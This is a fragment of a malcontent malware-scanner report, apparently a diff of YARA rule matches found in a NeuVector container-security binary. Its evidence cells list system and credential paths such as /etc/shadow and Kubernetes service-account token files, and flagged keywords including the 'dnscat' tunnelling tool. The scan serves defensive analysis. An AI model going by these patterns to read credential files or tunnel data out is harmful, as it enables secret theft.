[/etc/hostnameusr/lib/os-releaseetc/ce](https://github.com/search?q=%2Fetc%2Fhostnameusr%2Flib%2Fos-releaseetc%2Fce&type=code)
[/etc/hostsrt](https://github.com/search?q=%2Fetc%2Fhostsrt&type=code)
[/etc/httpd/conf/mime.typesid](https://github.com/search?q=%2Fetc%2Fhttpd%2Fconf%2Fmime.typesid&type=code)
[/etc/localtime](https://github.com/search?q=%2Fetc%2Flocaltime&type=code)
[/etc/login.defs/proc/](https://github.com/search?q=%2Fetc%2Flogin.defs%2Fproc%2F&type=code)
[/etc/mime.types](https://github.com/search?q=%2Fetc%2Fmime.types&type=code)
[/etc/mtablowerdir](https://github.com/search?q=%2Fetc%2Fmtablowerdir&type=code)
[/etc/neuvector/certs/internal/ca.cert](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fca.cert&type=code)
[/etc/neuvector/certs/internal/cert.ke](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fcert.ke&type=code)
[/etc/neuvector/certs/internal/cert.pe](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fcert.pe&type=code)
[/etc/neuvector/certs/internalcom.dock](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternalcom.dock&type=code)
[/etc/nsswitch.confinvalid](https://github.com/search?q=%2Fetc%2Fnsswitch.confinvalid&type=code)
[/etc/os-release](https://github.com/search?q=%2Fetc%2Fos-release&type=code)
[/etc/passwd/etc/shadow](https://github.com/search?q=%2Fetc%2Fpasswd%2Fetc%2Fshadow&type=code)
[/etc/pki/ca-trust/extracted/pem/tls-c](https://github.com/search?q=%2Fetc%2Fpki%2Fca-trust%2Fextracted%2Fpem%2Ftls-c&type=code)
[/etc/pki/tls/cacert.peminvalid](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcacert.peminvalid&type=code)
[/etc/pki/tls/certs/ca-bundle.crtx](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcerts%2Fca-bundle.crtx&type=code)
[/etc/protocolsunknown](https://github.com/search?q=%2Fetc%2Fprotocolsunknown&type=code)
[/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code)
[/etc/services](https://github.com/search?q=%2Fetc%2Fservices&type=code)
[/etc/shellssubmissionsnil](https://github.com/search?q=%2Fetc%2Fshellssubmissionsnil&type=code)
[/etc/ssl/ca-bundle.pemx](https://github.com/search?q=%2Fetc%2Fssl%2Fca-bundle.pemx&type=code)
[/etc/ssl/cert.peminvalid](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.peminvalid&type=code)
[/etc/ssl/certs/ca-certificates.crtadd](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts%2Fca-certificates.crtadd&type=code)
[/etc/subgid](https://github.com/search?q=%2Fetc%2Fsubgid&type=code)
[/etc/subuid](https://github.com/search?q=%2Fetc%2Fsubuid&type=code)
[/etc/sysconfig/clock/](https://github.com/search?q=%2Fetc%2Fsysconfig%2Fclock%2F&type=code)
[/etc/timezone/dev/.udev/db](https://github.com/search?q=%2Fetc%2Ftimezone%2Fdev%2F.udev%2Fdb&type=code)
[/etc/zoneinfoparsing](https://github.com/search?q=%2Fetc%2Fzoneinfoparsing&type=code) | -| LOW | [ref/path/etc/resolv.conf](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc-resolv.conf.yara#etc_resolv_conf) | accesses DNS resolver configuration | [/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code) | -| LOW | [ref/path/usr/bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/calico-nodePROC](https://github.com/search?q=%2Fusr%2Fbin%2Fcalico-nodePROC&type=code)
[/usr/bin/csp-billing-adapterio.kubernetes.container.namecannot](https://github.com/search?q=%2Fusr%2Fbin%2Fcsp-billing-adapterio.kubernetes.container.namecannot&type=code)
[/usr/bin/getconf/usr/bin/timeoutcontext](https://github.com/search?q=%2Fusr%2Fbin%2Fgetconf%2Fusr%2Fbin%2Ftimeoutcontext&type=code)
[/usr/bin/getentduplicated](https://github.com/search?q=%2Fusr%2Fbin%2Fgetentduplicated&type=code)
[/usr/bin/jqsupervisord.WithCancelgrpc.Servershort](https://github.com/search?q=%2Fusr%2Fbin%2Fjqsupervisord.WithCancelgrpc.Servershort&type=code)
[/usr/bin/lsof/usr/bin/curliptables-savegraceful_stop](https://github.com/search?q=%2Fusr%2Fbin%2Flsof%2Fusr%2Fbin%2Fcurliptables-savegraceful_stop&type=code)
[/usr/bin/pod/sbin/sysctl/usr/bin/topconfigure.shcontext.TODOcontent-type/](https://github.com/search?q=%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOcontent-type%2F&type=code)
[/usr/bin/supervisordAdd](https://github.com/search?q=%2Fusr%2Fbin%2FsupervisordAdd&type=code)
[/usr/bin/tee/usr/bin/pod/sbin/sysctl/usr/bin/topconfigure.shcontext.TODOc](https://github.com/search?q=%2Fusr%2Fbin%2Ftee%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOc&type=code)
[/usr/bin/topconfigure.shcontext.TODOcontent-type/dev/urandomshort](https://github.com/search?q=%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOcontent-type%2Fdev%2Furandomshort&type=code)
[/usr/bin/uname/usr/bin/iconvPROC](https://github.com/search?q=%2Fusr%2Fbin%2Funame%2Fusr%2Fbin%2FiconvPROC&type=code) | -| LOW | [ref/path/usr/sbin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-sbin.yara#usr_sbin_path) | path reference within /usr/sbin | [/usr/sbin/ethtool/usr/local/bin/dpexiting](https://github.com/search?q=%2Fusr%2Fsbin%2Fethtool%2Fusr%2Flocal%2Fbin%2Fdpexiting&type=code) | -| LOW | [ref/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var.yara#var_path) | path reference within /var | [/var//sbinpInfo/rootSwarmD.2.5D.2.7D.3.1D.3.2D.3.3D.3.4D.3.5D.3.6D.3.](https://github.com/search?q=%2Fvar%2F%2FsbinpInfo%2FrootSwarmD.2.5D.2.7D.3.1D.3.2D.3.3D.3.4D.3.5D.3.6D.3.&type=code)
[/var/lib/docker/aufs/diffno](https://github.com/search?q=%2Fvar%2Flib%2Fdocker%2Faufs%2Fdiffno&type=code)
[/var/lib/rpm/Packages/lib/apk/db/installedFMON](https://github.com/search?q=%2Fvar%2Flib%2Frpm%2FPackages%2Flib%2Fapk%2Fdb%2FinstalledFMON&type=code)
[/var/nv_debug/pcap/controller](https://github.com/search?q=%2Fvar%2Fnv_debug%2Fpcap%2Fcontroller&type=code)
[/var/nv_debug/profileCannot](https://github.com/search?q=%2Fvar%2Fnv_debug%2FprofileCannot&type=code)
[/var/nv_debug/snapshotNeuVectorPolicyVersionGRP](https://github.com/search?q=%2Fvar%2Fnv_debug%2FsnapshotNeuVectorPolicyVersionGRP&type=code)
[/var/run/cri-dockerd.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcri-dockerd.sockFile&type=code)
[/var/run/crio/crio.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcrio%2Fcrio.sockFile&type=code)
[/var/run/docker.sock/var/lib/dpkg/statusFile](https://github.com/search?q=%2Fvar%2Frun%2Fdocker.sock%2Fvar%2Flib%2Fdpkg%2FstatusFile&type=code)
[/var/run/dockershim.sock/var/lib/rpm/Packages.dbFMON](https://github.com/search?q=%2Fvar%2Frun%2Fdockershim.sock%2Fvar%2Flib%2Frpm%2FPackages.dbFMON&type=code)
[/var/run/openvswitch/Error](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2FError&type=code)
[/var/run/openvswitch/db.sockNotify](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2Fdb.sockNotify&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/ca.crtk8s.io.apimachine](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Fca.crtk8s.io.apimachine&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/namespaceproto](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Fnamespaceproto&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/tokenk8s.io.apimachiner](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftokenk8s.io.apimachiner&type=code)
[/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | -| LOW | [ref/site/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/url.yara#https_url) | contains embedded HTTPS URLs | [https://bugs.centos.org/](https://bugs.centos.org/)
[https://docker.io/](https://docker.io/)
[https://finishedmemLimitplatform](https://finishedmemLimitplatform)
[https://git.k8s.io/community/contributors/devel/sig-architecture/api-conv](https://git.k8s.io/community/contributors/devel/sig-architecture/api-conv)
[https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md](https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md)
[https://golang.org/pkg/unicode/](https://golang.org/pkg/unicode/)
[https://index.docker.io/json](https://index.docker.io/json)
[https://kubernetes.default/apis/config.openshift.io/v1/clusteroperators/o](https://kubernetes.default/apis/config.openshift.io/v1/clusteroperators/o)
[https://kubernetes.default/version/openshiftproto](https://kubernetes.default/version/openshiftproto)
[https://kubernetes.default/versionproto](https://kubernetes.default/versionproto)
[https://kubernetes.io/docs/reference/using-api/api-concepts/](https://kubernetes.io/docs/reference/using-api/api-concepts/)
[https://protobuf.dev/reference/go/faq](https://protobuf.dev/reference/go/faq)
[https://registry-1.docker.io/bufio.Scanner](https://registry-1.docker.io/bufio.Scanner)
[https://registry.hub.docker.com/Failed](https://registry.hub.docker.com/Failed)
[https://www.centos.org/](https://www.centos.org/)
[https://www.iana.org/assignments/service-names-port-numbers/service-names](https://www.iana.org/assignments/service-names-port-numbers/service-names) | -| LOW | [ref/words/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/password.yara#password) | references a 'password' | [GetPassword](https://github.com/search?q=GetPassword&type=code)
[PasswordEprotobuf](https://github.com/search?q=PasswordEprotobuf&type=code)
[UserPassword](https://github.com/search?q=UserPassword&type=code)
[d for field Passwordruntime](https://github.com/search?q=d+for+field+Passwordruntime&type=code)
[no passwords used](https://github.com/search?q=no+passwords+used&type=code)
[passwordSet](https://github.com/search?q=passwordSet&type=code)
[socksUsernamePassword](https://github.com/search?q=socksUsernamePassword&type=code)
[stripPassword](https://github.com/search?q=stripPassword&type=code)
[vpasswordoffsets](https://github.com/search?q=vpasswordoffsets&type=code) | -| LOW | [ref/words/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/plugin.yara#plugin) | references a 'plugin' | [PluginPidns](https://github.com/search?q=PluginPidns&type=code)
[Plugincontainerd](https://github.com/search?q=Plugincontainerd&type=code)
[PluginsRequest](https://github.com/search?q=PluginsRequest&type=code)
[PluginsResponseproto](https://github.com/search?q=PluginsResponseproto&type=code)
[Plugins_Handler](https://github.com/search?q=Plugins_Handler&type=code)
[Pluginscontainerd](https://github.com/search?q=Pluginscontainerd&type=code)
[Pluginsproto](https://github.com/search?q=Pluginsproto&type=code)
[adaptPlugin](https://github.com/search?q=adaptPlugin&type=code)
[getPlugins](https://github.com/search?q=getPlugins&type=code)
[pluginCache](https://github.com/search?q=pluginCache&type=code)
[pluginpath](https://github.com/search?q=pluginpath&type=code)
[pluginsFA](https://github.com/search?q=pluginsFA&type=code)
[pluginsToPB](https://github.com/search?q=pluginsToPB&type=code)
[s plugingithub](https://github.com/search?q=s+plugingithub&type=code)
[vplugin](https://github.com/search?q=vplugin&type=code)
[wplugin](https://github.com/search?q=wplugin&type=code) | -| LOW | [secrets/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/private_key.yara#private_key_val) | References private keys | [privateKey](https://github.com/search?q=privateKey&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [3P/threat_hunting/dnscat](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#dnscat_offensive_tool_keyword) | [references 'dnscat' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [dnscat](https://github.com/search?q=dnscat&type=code) | +| MEDIUM | [3P/threat_hunting/tcpdump](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#tcpdump_greyware_tool_keyword) | [references 'tcpdump' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [tcpdump](https://github.com/search?q=tcpdump&type=code) | +| MEDIUM | [archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) | +| MEDIUM | [combo/backdoor/iptables](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/backdoor/iptables.yara#iptables_upload_http) | uploads, uses iptables and HTTP | [HTTP](https://github.com/search?q=HTTP&type=code)
[iptables -](https://github.com/search?q=iptables+-&type=code)
[iptables-savegraceful](https://github.com/search?q=iptables-savegraceful&type=code)
[iptablessent](https://github.com/search?q=iptablessent&type=code)
[uploadCurrentInfo](https://github.com/search?q=uploadCurrentInfo&type=code)
[uploadgoogle](https://github.com/search?q=uploadgoogle&type=code)
[uploads](https://github.com/search?q=uploads&type=code) | +| MEDIUM | [combo/net/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/host_port.yara#go_scan_tool_val) | Uses struct with JSON representations for host:port | [json:"hostname"](https://github.com/search?q=json%3A%22hostname%22&type=code)
[json:"ip"](https://github.com/search?q=json%3A%22ip%22&type=code)
[json:"port"](https://github.com/search?q=json%3A%22port%22&type=code) | +| MEDIUM | [combo/net/tunnel_proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [Proxy](https://github.com/search?q=Proxy&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | +| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code) | +| MEDIUM | [data/embedded/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-zstd.yara#embedded_zstd) | [Contains compressed content in ZStandard format](https://github.com/facebook/zstd) | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code) | +| MEDIUM | [databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | +| MEDIUM | [databases/postgresql](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/postgresql.yara#postgresql) | accesses PostgreSQL databases | [postgresql](https://github.com/search?q=postgresql&type=code) | +| MEDIUM | [databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite3](https://github.com/search?q=sqlite3&type=code) | +| MEDIUM | [evasion/content/length/0](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/content-length-0.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd.yara#exec) | executes a command | [evaluateRuntimeCmd](https://github.com/search?q=evaluateRuntimeCmd&type=code)
[isAllowIpRuntimeCommand](https://github.com/search?q=isAllowIpRuntimeCommand&type=code)
[isAllowRuncInitCommand](https://github.com/search?q=isAllowRuncInitCommand&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | +| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) | +| MEDIUM | [fs/file/times/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-times-set.yara#utimes) | [change file last access and modification times](https://linux.die.net/man/2/utimes) | [utimes](https://github.com/search?q=utimes&type=code) | +| MEDIUM | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-chown.yara#Chown) | Changes file ownership | [Chown](https://github.com/search?q=Chown&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [Chmod](https://github.com/search?q=Chmod&type=code)
[chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [kernel/apparmor](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/apparmor.yara#apparmor) | Mentions 'apparmor' | [apparmor](https://github.com/search?q=apparmor&type=code) | +| MEDIUM | [kernel/dev/block/device](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/dev/block-device.yara#block_devices) | works with block devices | [/sys/blocktimestampsdocker](https://github.com/search?q=%2Fsys%2Fblocktimestampsdocker&type=code) | +| MEDIUM | [kernel/dev/loopback](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/dev/loopback.yara#dev_loopback) | access virtual block devices (loopback) | [/dev/loop%dfusermount3low](https://github.com/search?q=%2Fdev%2Floop%25dfusermount3low&type=code) | +| MEDIUM | [kernel/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | +| MEDIUM | [net/bpf](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/bpf.yara#bpf) | BPF (Berkeley Packet Filter) | [bpf](https://github.com/search?q=bpf&type=code) | +| MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | +| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download.yara#download) | download files | [CLUSSnifferDownloadshare](https://github.com/search?q=CLUSSnifferDownloadshare&type=code)
[MaxConcurrentDownloads](https://github.com/search?q=MaxConcurrentDownloads&type=code)
[portsessionsdownloadruleslen](https://github.com/search?q=portsessionsdownloadruleslen&type=code) | +| MEDIUM | [net/http/cookies](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-cookies.yara#http_cookie) | [access HTTP resources using cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) | [Cookie](https://github.com/search?q=Cookie&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code) | +| MEDIUM | [net/http/form/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-form-upload.yara#http_form_upload) | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping not acked within timeout](https://github.com/search?q=ping+not+acked+within+timeout&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-parse.yara#ip_go) | parses IP address (IPv4 or IPv6) | [IsLinkLocalUnicast](https://github.com/search?q=IsLinkLocalUnicast&type=code)
[IsSingleIP](https://github.com/search?q=IsSingleIP&type=code) | +| MEDIUM | [net/mac/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code)
[macAddress](https://github.com/search?q=macAddress&type=code) | +| MEDIUM | [net/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | +| MEDIUM | [net/socket/connect](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-connect.yara#_connect) | [initiate a connection on a socket](https://linux.die.net/man/3/connect) | [_connect](https://github.com/search?q=_connect&type=code) | +| MEDIUM | [net/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | +| MEDIUM | [net/stat](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/stat.yara#netstat) | Uses 'netstat' for network information | [netstatmodinfonil keyde](https://github.com/search?q=netstatmodinfonil+keyde&type=code) | +| MEDIUM | [net/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/upload.yara#upload) | uploads files | [UploadUUID](https://github.com/search?q=UploadUUID&type=code)
[UploadedLayers](https://github.com/search?q=UploadedLayers&type=code)
[uploadCurrentInfo](https://github.com/search?q=uploadCurrentInfo&type=code)
[uploadgoogle](https://github.com/search?q=uploadgoogle&type=code)
[uploads](https://github.com/search?q=uploads&type=code) | +| MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url-encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | +| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url-request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code) | +| MEDIUM | [process/name/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [procfs/arbitrary/pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/mounts/sys](https://github.com/search?q=%2Fproc%2F%25d%2Fmounts%2Fsys&type=code)
[/proc/%d/root/kube](https://github.com/search?q=%2Fproc%2F%25d%2Froot%2Fkube&type=code)
[/proc/%d/rootFA](https://github.com/search?q=%2Fproc%2F%25d%2FrootFA&type=code)
[/proc/%d/task/](https://github.com/search?q=%2Fproc%2F%25d%2Ftask%2F&type=code)
[/proc/%dcopy](https://github.com/search?q=%2Fproc%2F%25dcopy&type=code)
[/proc/%v/stat](https://github.com/search?q=%2Fproc%2F%25v%2Fstat&type=code) | +| MEDIUM | [procfs/cpuinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/cpuinfo.yara#proc_cpuinfo) | get CPU info | [/proc/cpuinfo](https://github.com/search?q=%2Fproc%2Fcpuinfo&type=code) | +| MEDIUM | [procfs/self/cgroup](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/self-cgroup.yara#pid_self_cgroup) | accesses /proc files within own cgroup | [/proc/self/cgroup](https://github.com/search?q=%2Fproc%2Fself%2Fcgroup&type=code) | +| MEDIUM | [procfs/self/mountinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/self-mountinfo.yara#proc_self_mountinfo) | gets mount info associated to this process | [/proc/self/mountinfo](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfo&type=code) | +| MEDIUM | [ref/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/daemon.yara#daemon) | Run as a background daemon | [build-daemon](https://github.com/search?q=build-daemon&type=code)
[docker_daemon](https://github.com/search?q=docker_daemon&type=code) | +| MEDIUM | [ref/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[attachPort](https://github.com/search?q=attachPort&type=code)
[clientPort](https://github.com/search?q=clientPort&type=code)
[cluster_ip](https://github.com/search?q=cluster_ip&type=code)
[del_port](https://github.com/search?q=del_port&type=code)
[detachPort](https://github.com/search?q=detachPort&type=code)
[dstPort](https://github.com/search?q=dstPort&type=code)
[dst_ip](https://github.com/search?q=dst_ip&type=code)
[dst_port](https://github.com/search?q=dst_port&type=code)
[exPort](https://github.com/search?q=exPort&type=code)
[fqdn_ip](https://github.com/search?q=fqdn_ip&type=code)
[global_ip](https://github.com/search?q=global_ip&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[hostIp](https://github.com/search?q=hostIp&type=code)
[hostPort](https://github.com/search?q=hostPort&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inPort](https://github.com/search?q=inPort&type=code)
[in_port](https://github.com/search?q=in_port&type=code)
[ipPort](https://github.com/search?q=ipPort&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
[nat_ip](https://github.com/search?q=nat_ip&type=code)
[nat_port](https://github.com/search?q=nat_port&type=code)
[nfq_port](https://github.com/search?q=nfq_port&type=code)
[pIp](https://github.com/search?q=pIp&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[readPort](https://github.com/search?q=readPort&type=code)
[remote_ip](https://github.com/search?q=remote_ip&type=code)
[remote_port](https://github.com/search?q=remote_port&type=code)
[rpcPort](https://github.com/search?q=rpcPort&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[srcPort](https://github.com/search?q=srcPort&type=code)
[src_ip](https://github.com/search?q=src_ip&type=code)
[src_port](https://github.com/search?q=src_port&type=code)
[srvc_port](https://github.com/search?q=srvc_port&type=code)
[syslog_ip](https://github.com/search?q=syslog_ip&type=code)
[syslog_port](https://github.com/search?q=syslog_port&type=code)
[tap_port](https://github.com/search?q=tap_port&type=code)
[unkn_ip](https://github.com/search?q=unkn_ip&type=code)
